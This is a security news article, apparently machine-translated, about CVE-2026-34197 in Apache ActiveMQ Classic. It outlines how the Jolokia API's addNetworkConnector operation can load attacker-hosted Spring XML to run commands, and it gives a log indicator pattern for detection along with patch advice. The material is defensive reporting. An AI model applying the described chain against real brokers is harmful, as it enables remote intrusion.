The historical failure of Apache ActiveMQ Classic that allowed to run remote commands, discovered with the help of the IA Claude

The security community has just discovered a critical failure in Apache ActiveMQ Classic that had not been detected for more than a decade and that allows to run remote commands in the affected systems. This is a vulnerability recorded as CVE-2026-34197, with a high gravity score (8.8), which affects ActiveMQ Classic versions prior to 5.19.4 and all editions between 6.0.0 and 6.2.3 until the correction was applied.

ActiveMQ is an open source message corridor written in Java and widely used in business infrastructure, web backends and government environments to manage asynchronous communication through tails and topics. Although there is a more modern branch called Artemis, the "Classic" edition remains widely deployed, and this vulnerability has an important reach in real environments.

The striking of this finding is not only the longevity of the failure, but the tool that helped identify the exploitation route: the assistant to IA Claude. Horizon3 researcher Naveen Sunkavally explains that by a few indications to the IA he was able to obtain an attack chain that connects several product functionalities. As described above, most of the work was produced by the IA and then refined by the research person, which illustrates how models can detect interactions between components that traditional analyses overlook.

The technical vector takes advantage of the Jolokia Management API on ActiveMQ. This API exposes an operation of the broker (addNetworkConnector) that, combined with certain remote-load configuration options, allows the broker to download a Spring XML file from a location controlled by the attacker. During the initialization of this external configuration system code can be run, leading to remote command execution. Horizon3 describes this flow and the associated risks in its technical report, which includes more details on failure mechanics and initial recommendations: Horizon3 report.

There is also an aggravating fact: although the operation requires in principle authentication via Jolokia, in certain versions (specifically ActiveMQ 6.0.0 to 6.1.1) that access barrier was opened by a separate failure, CVE-2024-32114 which allowed the API to be exposed without control, implicitly leaving the door open to an unauthenticated CERs. This explains in part why the problem could have gone unnoticed for so long: the parts involved behaved in an expected way separately, but combined allowed for an exploitable chain.

Apache's maintainers were notified at the end of March and published a quick correction; the parcheed versions are 5.19.4 and 6.2.3. The official security note and the correction announcement are available on the Apache ActiveMQ site: Apache ad on CVE-2026-34197. As always in these cases, updating to the parched versions should be the number one priority for any computer using ActiveMQ Classic.

In addition to updating, researchers recommend reviewing the broker records for specific indicators: internal VM-type connections that include remote configuration parameters with brokerConfig = xbean: http: / / and any repeated connection attempts that are accompanied by notice on configuration problems. These messages may indicate that the broker already tried to load the malicious configuration and that the execution of commands may have occurred.

ActiveMQ's history in real incidents makes this notice particularly relevant. Previous exploitations of the same product have been used in attacks in the real world - and some of these vulnerabilities appear in public risk catalogues - so infrastructure managers should treat this patch as urgent. For additional context on old vulnerabilities and their exploitation in the field, the CISA list on exploited vulnerabilities is a useful resource: CISA KEV.

Beyond the immediate patch, this case leaves a lesson on software security: automated analysis and traditional reviews may lose attack routes that emerge from the interaction between modules developed independently. The use of IA tools to support the discovery of vulnerabilities is proving to be valuable, but it also underlines the need to integrate that capacity into audit processes, security tests and access control, not as a single substitute for human reviews.

If you manage instances of ActiveMQ Classic, update as soon as possible, restrict access to the Jolokia Management API through network controls and strong authentication, and examine your log by abnormal patterns related to VM connections and remote configuration load parameters. For technical details and mitigation, the Horizon3 report and Apache's notice are the key references: Horizon3 and Apache ActiveMQ.